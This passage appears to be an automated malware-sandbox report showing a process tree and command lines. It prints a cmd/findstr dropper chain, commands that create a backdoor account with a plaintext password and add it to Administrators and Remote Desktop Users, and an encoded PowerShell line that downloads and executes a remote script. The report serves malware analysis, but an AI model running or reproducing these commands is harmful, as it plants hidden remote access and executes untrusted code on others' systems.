- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\expand.exeexpand2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Ben.vstx & ping 127.0.0.1 -n 302⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cryHKlvDvLuhDwDpMxynobZAdWijQHqaDpbXNKXpFUmHMDptfIpABkGYtEdNepMOLOKzEFvevVSgXsNMMrXinmQaDnTpxluvoLWYTQAKjitGaawMQEwZjEdkYsQyLjHjOvykcPS$" Ripreso.vstx4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Soffri.exe.comSoffri.exe.com P4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Soffri.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Soffri.exe.com P5⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 303⤵
- Runs ping.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc arak0qNC /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc arak0qNC /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc arak0qNC /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD2⤵
-
C:\Windows\system32\net1.exe (process tree depth 3)
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EZNBLWLT$ /ADD
-
C:\Windows\System32\cmd.exe (process tree depth 1)
Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
C:\Windows\system32\net.exe (process tree depth 2)
Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
C:\Windows\system32\net1.exe (process tree depth 3)
Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
C:\Windows\System32\cmd.exe (process tree depth 1)
Command line: cmd /C net.exe user WgaUtilAcc arak0qNC
-
C:\Windows\system32\net.exe (process tree depth 2)
Command line: net.exe user WgaUtilAcc arak0qNC
-
C:\Windows\system32\net1.exe (process tree depth 3)
Command line: C:\Windows\system32\net1 user WgaUtilAcc arak0qNC
-
C:\Windows\System32\cmd.exe (process tree depth 1)
Command line: cmd.exe /C wmic path win32_VideoController get name
-
C:\Windows\System32\Wbem\WMIC.exe (process tree depth 2)
Command line: wmic path win32_VideoController get name
-
C:\Windows\System32\cmd.exe (process tree depth 1)
Command line: cmd.exe /C wmic CPU get NAME
-
C:\Windows\System32\Wbem\WMIC.exe (process tree depth 2)
Command line: wmic CPU get NAME
-
C:\Windows\System32\cmd.exe (process tree depth 1)
Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
C:\Windows\system32\cmd.exe (process tree depth 2)
Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process tree depth 3)
Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads